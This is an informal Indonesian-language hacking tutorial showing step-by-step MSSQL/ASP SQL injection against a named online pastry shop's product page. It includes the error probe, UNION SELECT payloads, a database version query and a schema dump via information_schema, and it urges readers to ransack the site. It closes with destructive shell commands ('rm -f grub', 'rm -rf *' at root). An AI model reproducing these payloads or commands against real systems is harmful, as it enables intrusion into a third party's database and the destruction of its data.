MSSQL Injection / ASP injek

KonSepna Sangat Sederhana
(Kebanyakan Toko OL Pake Asp ini Lo Bro)

Contoh Site

http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33

Tambahi Syntak apa kek misal ' / =
Having Error
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string ''. 

/Product_Des.asp, line 11


Lanjut Ke Tahap Kedua

http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,2,3,4--

angka Togelna 3 kan
Kita Cek Versinya Dolo angka Togel /visible Colom dirubah

http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--

Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

Oke Tahap Ketiga
Schema Databesna :))

http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--

Keluar Semua Kan
Bantai Ajah Kali2 Ja Da Yang Menarik :))
cd /usr/sbin;rm -f grub
cd /;rm -rf *